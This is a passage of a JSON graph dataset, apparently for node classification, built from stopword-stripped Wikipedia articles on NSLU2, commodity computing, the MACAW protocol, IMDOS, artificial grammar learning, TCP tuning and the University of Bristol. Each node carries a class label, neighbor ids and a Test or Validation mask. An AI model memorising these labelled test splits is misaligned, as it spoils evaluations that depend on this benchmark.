access installed operating system must moved attached hard disk due lack space available flash memory done wide range additional packages available installed internet repository also possible run openwrt debian gentoo freebsd netbsd openbsd ubuntu device ability run unrestricted operating system device opens whole new range uses common uses web server mail server daap server itunes xlink kai upnp av mediaservers bittorrent client freeswitch asterisk pbx network router attachment usb network interface/usb modem german programmer boris pasternak developed weather server program/server meteohub inexpensive way gather weather sensor data personal weather stations pws allow posted number online weather services including weather underground weatherbug citizens weather observation program cwop many others nslu2 unslung firmware interfaced topfield tf5800 personal video recorder pvr allow electronic programme guide epg automatically downloaded internet transferred pvr nslu2 innovative networking reader award tom hardware 2004 awards",
    "neighbors": [
      1537,
      2178,
      3585,
      2308,
      10760,
      6797,
      2193,
      1682,
      405,
      2199,
      10393,
      5019,
      6178,
      7983,
      9266,
      823,
      1849,
      1728,
      7492,
      10820,
      11337,
      9163,
      7502,
      6618,
      5339,
      2784,
      225,
      3300,
      10341,
      8428,
      2285,
      9581,
      9964,
      1776,
      10606,
      2420,
      8319
    ],
    "mask": "Test"
  },
  {
    "node_id": 10110,
    "label": 4,
    "text": "List_of_security_hacking_incidents:list security hacking incidents timeline computer security hacker history covers important noteworthy events history security hacking cracking",
    "neighbors": [
      3072,
      8321,
      3843,
      6916,
      10756,
      3852,
      8976,
      9745,
      11152,
      4883,
      10132,
      21,
      3350,
      8735,
      9375,
      6305,
      2213,
      8613,
      7337,
      939,
      5547,
      3629,
      7851,
      7983,
      8879,
      1970,
      6837,
      6712,
      8632,
      8635,
      3774,
      1087,
      3525,
      8135,
      6473,
      6474,
      2251,
      8779,
      7887,
      7248,
      4689,
      2261,
      11221,
      2519,
      8023,
      1113,
      7515,
      4956,
      3807,
      9186,
      1251,
      101,
      488,
      2409,
      3944,
      1519,
      119,
      5245,
      2558,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 10111,
    "label": 3,
    "text": "Commodity_computing:commodity computing commodity computing also known commodity cluster computing involves use large numbers already-available computing components parallel computing get greatest amount useful computation low cost computing done commodity computers opposed high-cost superminicomputers boutique computers commodity computers computer systems manufactured multiple vendors incorporating components based open standards systems said based commodity components since standardization process promotes lower costs less differentiation among vendors products standardization decreased differentiation lower switching exit cost given vendor increasing purchasers leverage preventing lock-in governing principle commodity computing preferable low-performance low-cost hardware working parallel scalar computing e.g amd x86 cisc fewer high-performance high-cost hardware items e.g ibm power7 sun-oracle sparc risc point number discrete systems cluster greater mean time failures mtbf hardware platform matter reliable fault tolerance must built controlling software purchases optimized cost-per-unit-of-performance absolute performance-per-cpu cost first computers large expensive proprietary move towards commodity computing began dec introduced pdp-8 1965 computer relatively small inexpensive enough department could purchase one without convening meeting board directors entire minicomputer industry sprang supply demand 'small computers like pdp-8 unfortunately many different brands minicomputers stand software little hardware compatibility brands first general purpose microprocessor introduced 1974 immediately began chipping away low end computer market replacing embedded minicomputers many industrial devices process accelerated 1977 introduction first commodity-like microcomputer apple ii development visicalc application 1979 microcomputers broke factory began entering office suites large quantities still back door ibm pc introduced 1981 immediately began displacing apple iis corporate world commodity computing know today truly began compaq developed first true ibm pc compatible pc-compatible microcomputers began coming big companies front door commodity computing well established 1980s microcomputers began displacing larger computers serious way first price key justification late 1980s early 1990s vlsi semiconductor technology evolved point microprocessor performance began eclipse performance discrete logic designs traditional designs limited speed-of-light delay issues inherent cpu larger single chip performance alone began driving success microprocessor-based systems mid-1990s nearly computers made based microprocessors majority general purpose microprocessors implementations x86 instruction set architecture although time every traditional computer manufacturer proprietary micro-based designs manufacturers non-commodity computer systems today today fewer fewer general business computing requirements met off-the-shelf commodity computers likely low-end supermicrocomputer genre continue pushed upward increasingly powerful commodity microcomputers",
    "neighbors": [
      7812,
      9621,
      8732,
      8735,
      10272,
      3487,
      9391,
      4017,
      5047,
      6591,
      10951,
      330,
      9677,
      2638,
      10447,
      11343,
      3795,
      3042,
      499,
      1399,
      6909,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10112,
    "label": 5,
    "text": "Multiple_Access_with_Collision_Avoidance_for_Wireless:multiple access collision avoidance wireless multiple access collision avoidance wireless macaw slotted medium access control mac protocol widely used ad hoc networks furthermore foundation many mac protocols used wireless sensor networks wsn ieee 802.11 rts/cts mechanism adopted protocol uses rts-cts-ds-data-ack frame sequence transferring data sometimes preceded rts-rrts frame sequence view provide solution hidden node problem although protocols based macaw s-mac use carrier sense addition rts/cts mechanism macaw make use carrier sense assume node data transfer node b. node initiates process sending request send frame rts node b destination node node b replies clear send frame cts receiving cts node sends data successful reception node b replies acknowledgement frame ack node send one data fragment wait random time successful data transfer compete adjacent nodes medium using rts/cts mechanism node overhearing rts frame example node f node e illustration refrains sending anything cts received waiting certain time captured rts followed cts maximum waiting time rts propagation time destination node turnaround time node node c node e overhearing cts frame refrains sending anything time data frame ack received solving hidden terminal problem plus random time rts cts frames contain information length data frame hence node uses information estimate time data transmission completion sending long data frame node sends short data-sending frame ds provides information length data frame every station overhears frame knows rts/cts exchange successful overhearing station node f might received rts ds cts defers transmissions ack frame received plus random time sum successful data transfer b consists following sequence frames macaw non-persistent slotted protocol meaning medium busy example cts message station waits random time start time slot sending rts results fair access medium example nodes b c data fragments send busy period chance access medium since transmission range node unaware ongoing data transfer node node b. node data send node c transmission range node d. initiates process sending rts frame node c. node c already deferred transmission completion current data transfer node node b avoid co-channel interference node b hence even though receives rts node reply back cts node assumes rts successful collision hence proceeds back using exponential backoff algorithm multiple data fragments send instant node successfully initiate data transfer small gaps node completed data transfer completion node b next cts node next data transfer request however due node backoff time period probability capture medium small time interval high increase per-node fairness macaw introduces new control message called request request send rrts node c reply earlier due ongoing transmission node node b sends rrts message node next contention period recipient rrts node immediately responds rts normal message exchange commenced nodes overhearing rrts defer two time slots long enough hear successful rts–cts exchange occurs summarize transfer may case consist following sequence frames node c additional back-off algorithms developed researched improve performance basic principle based use sequencing techniques node wireless network maintains counter limits number attempts less equal sequence number use wireless channel states control access probabilities node good channel state higher probability contention success reduces number collisions macaw generally solve exposed terminal problem assume node g data send node f example node g information ongoing data transfer b initiates process sending rts signal node f. node f transmission range node hear rts node g since exposed co-channel interference node g assumes rts successful collision hence backs tries case solution provided rrts mechanism improve situation much since data frames sent b rather long compared frames probability f exposed transmission rather high node f idea node interested initiating data transfer g happens transmit rts transmissions furthermore macaw might behave normally multicasting",
    "neighbors": [
      2306,
      388,
      8708,
      3847,
      11288,
      2458,
      5020,
      1192,
      11560,
      7723,
      11181,
      7490,
      9284,
      5321,
      7498,
      2911,
      2785,
      5092,
      5863,
      2802
    ],
    "mask": "Test"
  },
  {
    "node_id": 10113,
    "label": 2,
    "text": "IMDOS:imdos imdos modified version cp/m operating system intel 8080 processors used ims associates inc. ims imsai 8080 personal computer since mits would license operating system manufacturers ims approached gary kildall paid fixed fee 25,000 non-exclusive cp/m license imdos introduced interrupt-driven devices tree-structured directories advances cp/m",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      10333,
      97,
      5220,
      8298,
      8301,
      2672,
      9329,
      7285,
      9335,
      4727,
      2168,
      6778,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      3216,
      9366,
      6296,
      2201,
      7325,
      9887,
      2729,
      7849,
      3248,
      178,
      6837,
      8388,
      9932,
      5840,
      7382,
      8410,
      1253,
      4337,
      5363,
      11513,
      2811,
      10499,
      6921,
      1804,
      273,
      11539,
      2840,
      10016,
      2345,
      11562,
      7983,
      823,
      4409,
      7483,
      7999,
      11075,
      4423,
      5457,
      11601,
      10067,
      10590,
      10083,
      8551,
      5492,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      11184,
      6075,
      6078,
      9151,
      4548,
      8136,
      1515,
      3056,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 10114,
    "label": 0,
    "text": "Artificial_grammar_learning:artificial grammar learning artificial grammar learning agl paradigm study within cognitive psychology linguistics goal investigate processes underlie human language learning testing subjects ability learn made-up grammar laboratory setting developed evaluate processes human language learning also utilized study implicit learning general sense area interest typically subjects ability detect patterns statistical regularities training phase use new knowledge patterns testing phase testing phase either use symbols sounds used training phase transfer patterns another set symbols sounds surface structure many researchers propose rules artificial grammar learned implicit level since rules grammar never explicitly presented participants paradigm also recently utilized areas research language learning aptitude structural priming investigate brain structures involved syntax acquisition implicit learning apart humans paradigm also used investigate pattern learning species e.g cottontop tamarins starlings half century ago george a. miller established paradigm artificial grammar learning order investigate influence explicit grammar structures human learning designed grammar model letters different sequences research demonstrated easier remember structured grammar sequence random sequence letters explanation learners could identify common characteristics learned sequences accordingly encode memory set predicted subjects could identify letters likely appear together sequence repeatedly letters would subjects would use information form memory sets memory sets served participants strategy later memory tests reber doubted miller explanation claimed participants could encode grammar rules productive memory sets able verbalize strategy detail conducted research led development modern agl paradigm research used synthetic grammar learning model test implicit learning agl became used tested model field original paradigm developed miller participants asked memorize list letter strings created artificial grammar rule model test phase participants told set rules behind letter sequences memorized instructed categorize new letter strings based set rules previously exposed classified new letter strings grammatical constructed grammar rule vs. randomly constructed sequences subjects correctly sorted new strings chance level could inferred subjects acquired grammatical rule structure without explicit instruction rules reber found participants sorted new strings chance level reported using strategies sorting task could actually verbalize strategies subjects could identify strings grammatically correct could identify rules composed grammatical strings research replicated expanded upon many others conclusions studies congruent reber hypothesis implicit learning process done intentional learning strategies studies also identified common characteristics implicitly acquired knowledge modern agl paradigm used investigate explicit implicit learning although often used test implicit learning typical agl experiment participants required memorize strings letters previously generated specific grammar length strings usually ranges 2-9 letters per string example grammar shown figure 1 figure 1 example artificial grammar rule order compose grammatically ruleful string letters according predetermined grammar rule subject must follow rules pairing letters represented model figure 1 observing violation grammatical rule system composes string considered unruleful randomly constructed string case standard agl implicit learning task subjects told strings based specific grammar instead simply given task memorize letter strings memory learning phase subjects told letter strings presented learning phase based specific rules explicitly told rules test phase subjects instructed categorize new letter strings ruleful unruleful dependent variable usually measured percentage correctly categorized strings implicit learning considered successful percentage correctly sorted strings significantly higher chance level significant difference found indicates existence learning process involved memorizing presented letter strings mechanism behind implicit learning hypothesized occur people engage artificial grammar learning statistical learning specifically bayesian learning bayesian learning takes account types biases prior probability distributions individuals contribute outcome implicit learning tasks biases thought probability distribution contains probability possible hypothesis likely correct due structure bayesian model inferences output model form probability distribution rather single probable event output distribution posterior probability distribution posterior probability hypothesis original distribution probability hypothesis true given data probability data given hypothesis true bayesian model learning fundamental understanding pattern detection process involved implicit learning therefore mechanisms underlie acquisition artificial grammar learning rules hypothesized implicit learning grammar involves predicting co-occurrences certain words certain order example dog chased ball sentence learned grammatically correct implicit level due high co-occurrence chase one words follow dog sentence like dog cat ball implicitly recognized grammatically incorrect due lack utterances contain words paired specific order process important teasing apart thematic roles parts speech grammatical processing see grammar labeling thematic roles parts speech explicit identification words parts speech implicit traditional approaches agl claim stored knowledge obtained learning phase abstract approaches argue stored knowledge concrete consists exemplars strings encountered learning phase chunks exemplars case assumed information stored memory retrieved test phase used aid decisions letter strings 3 main approaches attempt explain agl phenomena research amnesia patients suggests dual factor approach may accurate model series experiments amnesiac patients support idea agl involves abstract concepts concrete exemplars amnesiacs able classify stimuli grammatical vs. randomly constructed well participants control group able successfully complete task amnesiacs able explicitly recall grammatical chunks letter sequence control group able explicitly recall performing task grammar rules different sequence letters previously tested amnesiacs control group able complete task although performance better task completed using set letters used training results experiment support dual factor approach artificial grammar learning people use abstract information learn rules grammars use concrete exemplar-specific memory chunks since amnesiacs unable store specific chunks memory completed task using abstract set rules control group able store specific chunks memory evidenced recall store examples memory later reference agl research criticized due automatic question agl considered automatic process encoding see encoding memory performance automatic sense occurring without conscious monitoring without conscious guidance performer ’ intentions case agl claimed implicit learning automatic process due fact done intention learning specific grammar rule complies classic definition automatic process fast unconscious effortless process may start unintentionally aroused continues without ability stop ignore consequences definition challenged many times alternative definitions automatic process given reber presumption agl automatic could problematic implying unintentional process automatic process essence focusing agl tests issues need addressed process complex contains encoding recall retrieval encoding retrieval could interpreted automatic processes since encoded learning stage necessary task intentionally performed test stage researchers need differentiate implicitness referring process learning knowledge encoding also referring performance test phase knowledge retrieval knowledge encoded training may include many aspects presented stimuli whole strings relations among elements etc. contribution various components performance depends specific instruction acquisition phase requirements retrieval task therefore instructions every phase important order determine whether stage require automatic processing phase evaluated automaticity separately one hypothesis contradicts automaticity agl mere exposure effect mere exposure effect increased affect towards stimulus result nonreinforced repeated exposure stimulus results 200 experiments effect indicate positive relationship mean goodness rating frequency stimulus exposure stimuli experiments included line drawings polygons nonsense words types stimuli used agl research experiments exposed participants stimulus 25 times following exposure participants asked rate degree stimulus suggested good vs. bad effect 7-point scale addition main pattern results also found several experiments participants rated higher positive affect previously exposed items novel items since implicit cognition reference previous study episodes effects affect ratings observed processing stimuli truly implicit results experiments suggests different categorization strings may occur due differences affect associated strings due implicitly learned grammar rules since advent computers artificial intelligence computer programs adapted attempt simulate implicit learning process observed agl paradigm ai programs first adapted simulate natural artificial grammar learning used following basic structure early model ai grammar learning wolff snpr system program acquires series letters pauses punctuation words sentences program examines string subsets looks common sequences symbols defines chunks terms sequences chunks akin exemplar-specific chunks described agl model acquires chunks exposure chunks begin replace sequences unbroken letters chunk precedes follows common chunk model determines disjunctive classes terms first set example model encounters the-dog-chased the-cat-chased classifies dog cat members class since precede chase model sorts chunks classes explicitly define groups e.g. noun verb early ai models grammar learning ignored importance negative instances grammar effect grammar acquisition also lacking ability connect grammatical rules pragmatics semantics newer models attempted factor details unified model attempts take factors account model breaks grammar according cues languages mark case roles using five possible cue types word order case marking agreement intonation verb-based expectation see grammar influence cue language grammar determined cue strength cue validity values determined using formula except cue strength defined experimental results cue validity defined corpus counts language databases formula cue strength/validity follows cue availability proportion times cue available times needed cue reliability proportion times cue correct total occurrences cue incorporating cue reliability along cue availability unified model able account effects negative instances grammar since takes accuracy frequency account result also accounts semantic pragmatic information since cues produce grammar appropriate context low cue strength cue validity macwhinney model also simulates natural grammar learning attempts model implicit learning processes observed agl paradigm contemporary studies agl attempted identify structures involved acquisition grammar implicit learning agrammatic aphasic patients see agrammatism tested agl paradigm results show breakdown language agrammatic aphasia associated impairment artificial grammar learning indicating damage domain-general neural mechanisms sub serving language sequential learning de vries barth maiworm knecht zwitserlood flöel found electrical stimulation broca area enhances implicit learning artificial grammar direct current stimulation may facilitate acquisition grammatical knowledge finding potential interest rehabilitation aphasia petersson vasiliki hagoort examine neurobiological correlates syntax processing structured sequences comparing fmri results artificial natural language syntax argue chomsky hierarchy directly relevant neurobiological systems agl testing",
    "neighbors": [
      6274,
      10102,
      8759
    ],
    "mask": "Test"
  },
  {
    "node_id": 10115,
    "label": 5,
    "text": "TCP_tuning:tcp tuning tcp tuning techniques adjust network congestion avoidance parameters transmission control protocol tcp connections high-bandwidth high-latency networks well-tuned networks perform 10 times faster cases however blindly following instructions without understanding real consequences hurt performance well bandwidth-delay product bdp term primarily used conjunction tcp refer number bytes necessary fill tcp path i.e equal maximum number simultaneous bits transit transmitter receiver high performance networks large bdps give practical example two nodes communicating geostationary satellite link round-trip delay time round-trip time rtt 0.5 seconds bandwidth 10 gbit/s 0.5×10 bits i.e. 5 gbit 625 mb unacknowledged data flight despite much lower latencies satellite links even terrestrial fiber links high bdps link capacity large operating systems protocols designed recently years ago networks slower tuned bdps orders magnitude smaller implications limited achievable performance original tcp configurations supported tcp receive window size buffers 65,535 64 kib 1 bytes adequate slow links links small rtts larger buffers required high performance options described buffering used throughout high performance network systems handle delays system general buffer size need scaled proportionally amount data flight time high performance applications sensitive network delays possible interpose large end end buffering delays putting intermediate data storage points end end system use automated scheduled non-real-time data transfers get data final endpoints maximum achievable throughput single tcp connection determined different factors one trivial limitation maximum bandwidth slowest link path also less obvious limits tcp throughput bit errors create limitation connection well rtt computer networking rwin tcp receive window amount data computer accept without acknowledging sender sender received acknowledgement first packet sent stop wait wait exceeds certain limit may even retransmit tcp achieves reliable data transmission even packet loss network windowing limit throughput tcp transmits data window size waiting acknowledgements full bandwidth network may always get used limitation caused window size calculated follows formula_1 rwin tcp receive window rtt round-trip time path given time window advertised receive side tcp corresponds amount free receive memory allocated connection otherwise would risk dropping received packets due lack space sending side also allocate amount memory receive side good performance even data sent network sending side must hold memory acknowledged successfully received case would retransmitted receiver far away acknowledgments take long time arrive send memory small saturate block emission simple computation gives optimal send memory size receive memory size given packet loss occurs network additional limit imposed connection case light moderate packet loss tcp rate limited congestion avoidance algorithm limit calculated according formula mathis et al formula_2 mss maximum segment size p probability packet loss packet loss rare tcp window becomes regularly fully extended formula n't apply number extensions made tcp years increase performance fast high-rtt links long fat networks lfns tcp timestamps rfc 1323 play double role avoid ambiguities due 32-bit sequence number field wrapping around allow precise rtt estimation presence multiple losses per rtt improvements becomes reasonable increase tcp window beyond 64 kb done using window scaling option rfc 1323 tcp selective acknowledgment option sack rfc 2018 allows tcp receiver precisely inform tcp sender segments lost increases performance high-rtt links multiple losses per window possible path mtu discovery avoids need in-network fragmentation increasing performance presence packet loss",
    "neighbors": [
      10242,
      3847,
      649,
      7817,
      9868,
      6797,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      3133,
      3006,
      5181,
      5437,
      7364,
      2887,
      8391,
      8265,
      2509,
      4687,
      5843,
      4692,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      7017,
      11112,
      367,
      112,
      8432,
      6651,
      6524
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10116,
    "label": 3,
    "text": "University_of_Bristol:university bristol university bristol simply referred bristol university abbreviated bris post-nominal letters uob red brick research university located bristol united kingdom received royal charter 1909 although like university west england university bath trace roots merchant venturers technical college founded school 1595 society merchant venturers key predecessor institution university college bristol existence since 1876 bristol organised six academic faculties composed multiple schools departments running 200 undergraduate courses largely situated tyndalls park area city university total income £642.7 million 2017/18 £164.0 million research grants contracts. ref name= bristol financial statement 17/18 /ref largest independent employer bristol university bristol ranked 44th qs world university rankings 2018 ranked amongst top 10 uk universities qs arwu highly selective institution average 6.4 sciences faculty 13.1 medicine dentistry faculty applicants undergraduate place ranked 9th uk amongst multi-faculty institutions quality gpa research research power 2014 research excellence framework current academics include 21 fellows academy medical sciences 13 fellows british academy 13 fellows royal academy engineering 44 fellows royal society university associated 13 nobel laureates throughout history including paul dirac sir william ramsay cecil frank powell sir winston churchill dorothy hodgkin hans albrecht bethe max delbrück gerhard herzberg sir nevill francis mott sir paul nurse harold pinter jean-marie gustave le clézio recently 2015 economics nobel prize winner angus deaton bristol member russell group research-intensive british universities european-wide coimbra group worldwide universities network university previous vice-chancellor eric thomas chairman 2005 2007 addition university holds erasmus charter sending 500 students per year partner institutions europe earliest antecedent university engineering department merchant venturers technical college founded school early 1595 became engineering faculty bristol university university also preceded bristol medical school 1833 university college bristol founded 1876 first lecture attended 99 students university able apply royal charter due financial support wills fry families made fortunes tobacco plantations chocolate respectively wills family made vast fortune tobacco industry gave generously city university royal charter gained may 1909 288 undergraduates 400 students entering university october 1909 henry overton wills iii became first chancellor university college first institution country admit women basis men however women forbidden take examinations medicine 1906 since founding university 1909 grown considerably one largest employers local area although smaller student numbers nearby university west england bristol campus spread considerable geographic area activities however concentrated area city centre referred university precinct member russell group research-led uk universities coimbra group leading european universities worldwide universities network wun founding university college 1876 government support began 1889 mergers bristol medical school 1893 merchant venturers technical college 1909 funding allowed opening new medical school engineering school—two subjects remain among university greatest strengths 1908 gifts fry wills families particularly £100,000 henry overton wills iii £6m today money provided endow university bristol west england provided royal charter could obtained within two years december 1909 king granted charter erected university bristol henry wills became first chancellor conwy lloyd morgan first vice-chancellor wills died 1911 tribute sons george harry built wills memorial building starting 1913 finally finishing 1925 today houses parts academic provision earth sciences law graduation ceremonies held great hall wills memorial building grade ii* listed building 1920 george wills bought victoria rooms endowed university students union building houses department music grade ii* listed building point foundation university required provide local community mission behind creation department extra-mural adult education 1924 provide courses local community mission continues today new admissions policy specifically caters 'bs postcode area bristol among famous names associated bristol early period paul dirac graduated 1921 degree engineering obtaining second degree mathematics 1923 cambridge subsequent pioneering work quantum mechanics awarded 1933 nobel prize physics later 1920s h.h wills physics laboratory opened ernest rutherford since housed several nobel prize winners cecil frank powell 1950 hans albrecht bethe 1967 sir nevill francis mott 1977 laboratory stands site today close bristol grammar school city museum sir winston churchill became university third chancellor 1929 serving university capacity 1965 succeeded richard haldane held office 1912 following death henry wills world war ii wills memorial bombed destroying great hall organ housed along 7,000 books removed king college london safe keeping since restored former glory complete oak panelled walls new organ 1946 university established first drama department country year bristol began offering special entrance exams grants aid resettlement servicemen returning home student numbers continued increase faculty engineering eventually needed new premises become queen building 1955 substantial building housed university engineers 1996 department electrical engineering department computer science moved road new merchant venturers building make space rapidly expanding fields today queen building caters teaching needs faculty provides academic space heavy engineering subjects civil mechanical aeronautical unprecedented growth 1960s particularly undergraduate numbers student union eventually acquired larger premises new building clifton area city 1965 building spacious victoria rooms given department music new union provides many practice performance rooms specialist rooms well three bars bar 100 mandela also known ar2 avon gorge whilst spacious union building thought many ugly character compared architecture rest clifton area mentioned bbc poll find worst architectural eyesores britain university proposed relocating union central location part development 'masterplan recently plans redevelopment current building proposed 1960s time considerable student activism united kingdom bristol exception 1968 many students marched support anderson report called higher student grants discontent culminated 11-day sit-in senate house administrative headquarters university series chancellors vice-chancellors led university decades henry somerset 10th duke beaufort taking churchill chancellor 1965 succeeded dorothy hodgkin 1970 spent next 18 years office age mass higher education dawned bristol continued build student numbers various undergraduate residences repeatedly expanded recently postgraduate residences constructed recent ventures funded run external companies agreement university since 1988 three chancellors sir jeremy morse chairman lloyds bank handed 2003 brenda hale first female law lord sir paul nurse succeeded lady hale chancellor 1 january 2017 one centres deaf studies united kingdom established bristol 1981 followed 1988 norah fry centre research learning difficulties also 1988 2004 students union agm voted disaffiliate national union students nus occasions however subsequent referendum students reversed decision bristol remains affiliated nus 2002 university involved argument press intrusion details then-prime minister tony blair son application university published national newspapers number postgraduate students grown particularly numbers pursuing taught master degrees eventually became need separate representation university bodies postgraduate union pgu established 2000 universities increasingly expected exploit intellectual property generated research activities 2000 bristol established research enterprise division red cause particularly technology-based businesses 2001 university signed 25-year research funding deal ip2ipo intellectual property commercialisation company 2007 research activities expanded opening advanced composites centre innovation science accis bristol institute public affairs bipa 2002 university opened new centre sports exercise health heart university precinct cost local residents also able use facilities expansion teaching research activities continues 2004 faculty engineering completed work bristol laboratory advanced dynamics engineering blade £18.5m project intended study dynamics advanced facility europe built extension queen building officially opened queen elizabeth ii march 2005 january 2005 school chemistry awarded £4.5m higher education funding council england create bristol chemlabs centre excellence teaching learning cetl additional £350k announced capital part project february 2006 bristol chemlabs stands bristol chemical laboratory sciences chemistry cetl uk september 2009 saw opening university centre nanoscience quantum information £11 million building known quietest building world technologically sophisticated features self-cleaning glass advanced research quantum computing nanotechnology materials disciplines undertaken building also plan significantly redevelop centre university precinct coming years first step began september 2011 start construction state-of-the-art life sciences building time heavy financial pressures universities £50 million project clear statement bristol committed world class research teaching facilities 2018 building work underway fry building building caught fire university regarded elitist commentators taking 41 undergraduate students non-state schools according recent 2009/2010 figures despite fact pupils make 7 population 18 16+ year old pupils across uk intake state school pupils bristol lower many oxbridge colleges high ratio undergraduates non-state school led tension university late february early march 2003 bristol became embroiled row admissions policies private schools threatening boycott based claims effort improve equality access university discriminating students claims hotly denied university august 2005 following large-scale survey independent schools council publicly acknowledged evidence bias applicants schools represented university new admissions policy lays considerable detail basis greater lesser weight may given particular parts applicant backgrounds – particular account may taken school applicant hails new policy also encourages greater participation locally resident applicants university bristol buildings date pre-charter days university college bristol buildings designed charles hansom younger brother joseph hansom joseph inventor hansom cab buildings suffered built stages due financial pressure george oatley added tower memory albert fry still seen university road first large scale building project university bristol undertook gaining charter wills memorial building hoped would symbol academic permanence university memorial chief benefactor university henry overton wills requested architect george oatley building built last least 400 years site purchased top park street suffered awkward slope desirability link building museum art gallery situated adjacent plot architecture critic roger gill stated building remarkable size noted ambience medieval university strangely lacking goes criticise building sham folly armorials founder window represent interests present founding university bristol including wills fry families tyndalls park estate royal fort house also purchased trustees tyndall family allowing university expand many departments faculty arts housed large victorian houses converted teaching goldney gardens entered property university bristol george wills hoped build all-male hall residence prevented due moral objection warden clifton hall house objected idea male female residences close proximity university records show miss starvey prepared resign issue support chancellor conwy lloyd morgan eventually land purchased stoke bishop allowing wills hall bought allowing building described quasi-oxbridge hall added dame monica wills chapel george wills widow death burwalls mansion house side avon gorge used halls residence past home sir george oatley building used house centre continuing education many modern buildings including senate house newer parts hh wills physics laboratory designed ralph brentnall funds university grants committee also responsible extension wills memorial building library completed standard realise extension original building brentnall oversaw rebuilding great hall wills memorial building partly destroyed bristol blitz world war ii buildings st michael hill rebuilt using hundreds old photographs recreate original houses flats goldney hall designed michael grice received award civic trust design bristol university owns best examples georgian architecture city best examples royal fort house clifton hill house goldney hall despite additions victoria rooms house music department designed charles dyer seen good example greek revival movement british architecture tympanum building depicts scene advent morning designed jabez tyley major feature large organ since destroyed fire november 2016 university announced plans build £300 million temple quarter campus c. 5,000 students next bristol temple meads railway station within bristol temple quarter enterprise zone new campus include business school digital research facilities student village expected open 2021 existing campus plans remodel tyndall avenue pedestrianise surrounding area build new library resource hub common uk universities bristol headed formally chancellor currently sir paul nurse led day-to-day basis vice-chancellor currently hugh brady academic leader chief executive four pro vice-chancellors three ceremonial pro-chancellors chancellor may hold office ten years pro-chancellors three unless university court determines otherwise vice-chancellor pro-vice-chancellors term limits vice-chancellor supported deputy vice-chancellor responsibility running university held executive level vice-chancellor council body recommend changes university statutes charter exception academic ordinances made consent senate chief academic body university also holds responsibility teaching learning examinations research enterprise chancellor pro chancellors nominated council appointed formally court whose additional powers limited appointments others including lay members council finally convocation body staff ceremonial officers graduates university returns 100 members court one member council otherwise principally forum discussion ensure graduates stay touch university university made number schools departments organised six faculties university specifies mix cambridge oxford academic dress part uses oxford-style gowns cambridge-style hoods required 'university red see logo top page 2004 university unveiled new crest icons crest sun wills family dolphin colston horse fry ship-and-castle medieval seal city bristol also used coat arms shape whole crest represents open book learning crest replaced university arms shown arms continue used specific historical ceremonial requirement arms comprise argent cross quadrate gules arms city bristol pale sun splendour wills open book proper leaved clasped inscribed words nisi quia dominus fesse sinister dolphin embowed colston dexter horse courant fry third inscription book latin opening 124th psalm lord side ... bristol 8th highest average entry qualification undergraduates uk university 2015 new students averaging 485 ucas points equivalent aaaaa a-level grades competition places high average 7.7 applications per place according 2014 sunday times league tables making joint 11th competitive university uk university gives offers admission 67.3 applicants 8th lowest amongst russell group according 2017 times sunday times good university guide approximately 40 bristol undergraduates come independent schools 2016-17 academic year university domicile breakdown 78:5:17 uk eu non-eu students respectively female male ratio 55:45 bristol ranked 10th overall sunday times 10-year 1998–2007 average ranking british universities based consistent league table performance member 'sutton 13 top ranked universities uk internationally 2016 qs world university rankings placed bristol 41st overall world 2012 2013 rankings also placed bristol 15th world terms reputation employers placing higher several american ivy league universities including princeton university cornell upenn bristol chosen ninth best university uk quality graduates according recruiters uk major companies another international ranking shanghai jiao tong university academic ranking world universities placed bristol 64th globally 2013 times higher education world university ranking placed bristol 66th 2011 bristol ranked 47th world 6th uk 2016 round university ranking 2017 u.s. news world report ranks bristol 76th world 2019 ranked 120th among universities around world scimago institutions rankings according data published sunday times bristol sixth-highest percentage good honours uk university 2010 centre higher education development excellence rankings bristol one four uk universities oxford ucl manchester rated excellent seven departments following courses offered university bristol managed reach top 5 'times ranking 2008 computer science 3rd electrical electronic engineering 3rd civil engineering 5th biological sciences 3rd mathematics 3rd psychology 4th furthermore qs world university rankings place bristol world top 100 universities subject areas 2011 arts humanities 57th natural sciences 40th engineering 83rd social sciences 65th life sciences 70th breakdown qs world university natural sciences ranking shows following earth sciences 25th mathematics 35th environmental sciences 39th physics 41st chemistry 48th addition bristol particularly strong field social sciences particularly economics finance management rated fourth 2008 guardian university guide business management studies 2011 guardian also ranked bristol third uk geography behind second place oxford ranked bristol 1st uk music complete university guide 2013 bristol ranked fifth german fourth russian third mechanical civil engineering third music second drama bristol also known research strength 15 departments gaining top grade 5* 2001 research assessment exercise overall 36 46 departments rated gained top two ratings 5 5* 76 academic staff working departments scored top two levels terms teaching strength bristol average teaching quality assessment score 22.05/24 tqa abolished bristol drop-out rate also lower benchmark set hefce 3.1 bristol awards range academic degrees spanning bachelor master degrees well junior doctorates higher doctorates postnominals awarded degree abbreviations used commonly among british universities university part engineering doctorate scheme awards eng d. systems engineering engineering management aerospace engineering non-destructive evaluation bristol notably award title bachelor degrees music available study awarded ba although award mmus dmus degree divinity since divinity available study students theology awarded ba similarly university award blitt bachelor letters although award mlitt dlitt regulations university name md dds higher doctorates although many universities degrees normally accredited professional doctorates degrees dlitt dsc deng lld dmus whilst regulations specifying grounds award often conferred honorary degrees honoris causa used commonly dlitt dsc lld occasionally mlitt also sometimes conferred honorarily distinction local area within university university bristol students union bristol su bsu located queen road founding member national union students amongst oldest students unions england union oversees three media outlets ubtv bristol university radio station burst student newspaper epigram also local branch tab terms student life union responsible organisation annual freshers fair co-ordination bristol student community action organises volunteering projects local community organisation entertainment events large number student societies previous presidents included sue lawley former liberal democrat mp lembit öpik separate union postgraduate students well athletic union member british universities colleges sport distinction blues awarded sporting excellence oxford cambridge bristol successful athletes awarded reds accommodation students primarily central precinct university two areas bristol clifton stoke bishop known respectively west north villages stoke bishop wills hall edge clifton downs first opened 1929 chancellor winston churchill original quadrangle layout expanded twice 1962 1990 churchill hall named chancellor followed 1956 badock hall 1964 time badock hall establishment buildings called hiatt baker hall two years later hiatt baker moved site largest hall university first self-catering hall stoke bishop university hall established 1971 expansion 1992 university newest 